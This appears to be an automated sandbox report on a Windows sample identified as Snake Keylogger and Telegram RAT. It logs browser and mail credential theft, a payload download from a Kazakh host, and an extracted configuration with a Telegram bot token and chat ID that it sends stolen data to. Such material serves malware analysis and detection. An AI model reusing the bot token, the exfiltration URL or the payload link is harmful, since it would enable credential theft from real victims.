Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
185.98.5.168	domzeleni.kz	Kazakhstan	200532	HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhs	false

Contacted Domains

Name	IP	Active
domzeleni.kz	185.98.5.168	true
reallyfreegeoip.org	188.114.96.3	true
api.telegram.org	149.154.167.220	true
checkip.dyndns.com	158.101.44.242	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://domzeleni.kz/image/bwSNbczRiJIuD15.bin	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

AV Detection

Found malware configuration

Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
Source: Contentious.exe.7972.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_238291E0 CryptUnprotectData,		6_2_238291E0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_23829941 CryptUnprotectData,		6_2_23829941

Uses 32bit PE files

Source: Torpernes.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Source: Torpernes.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_0040615C FindFirstFileW,FindClose,	0_2_0040615C
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004056A1
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0040615C FindFirstFileW,FindClose,	6_2_0040615C
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00402770 FindFirstFileW,	6_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_004056A1

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 0015FA39h	6_2_0015F778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0015E005
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 0015E61Fh	6_2_0015E431
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 0015EFA9h	6_2_0015E431
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0015D7F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0015DE23
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB15D8h	6_2_20CB11C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB1011h	6_2_20CB0D60
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBFB81h	6_2_20CBF8D8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBF729h	6_2_20CBF480
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB0751h	6_2_20CB04A0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBC761h	6_2_20CBC4B8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB02F1h	6_2_20CB0040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBC309h	6_2_20CBC060
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBBEB1h	6_2_20CBBC08
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBF2D1h	6_2_20CBF028
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBD469h	6_2_20CBD1C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB15D8h	6_2_20CB11B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBD011h	6_2_20CBCD68
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB0BB1h	6_2_20CB0900
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CB15D8h	6_2_20CB1506
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBCBB9h	6_2_20CBC910
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBE171h	6_2_20CBDEC8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBDD19h	6_2_20CBDA70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBD8C1h	6_2_20CBD618
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBEE79h	6_2_20CBEBD0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBBA59h	6_2_20CBB7B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBB601h	6_2_20CBB358
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBEA21h	6_2_20CBE778
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBB1A9h	6_2_20CBAF00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 20CBE5C9h	6_2_20CBE320
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238288EDh	6_2_238285B0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23820741h	6_2_23820498
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238272A2h	6_2_23826FF8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238269C9h	6_2_23826720
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_23823350
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_23823360
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23826E21h	6_2_23826B78
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23826571h	6_2_238262C8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23825CC1h	6_2_23825A18
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23826119h	6_2_23825E70
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23825869h	6_2_238255C0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23827FA9h	6_2_23827D00
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238253E9h	6_2_23825140
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23828401h	6_2_23828158
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23827B51h	6_2_238278A8
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 23820B99h	6_2_238208F0
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238202E9h	6_2_23820040
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 4x nop then jmp 238276F9h	6_2_23827450

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aaHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: domzeleni.kzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /image/bwSNbczRiJIuD15.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: domzeleni.kzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: domzeleni.kz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F6E000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020E99000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2177929958.0000000006E21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: Torpernes.exe, Contentious.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EBD000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://domzeleni.kz/
Source: Contentious.exe, 00000006.00000002.2943257213.00000000205A0000.00000004.00001000.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.bin
Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.binB
Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
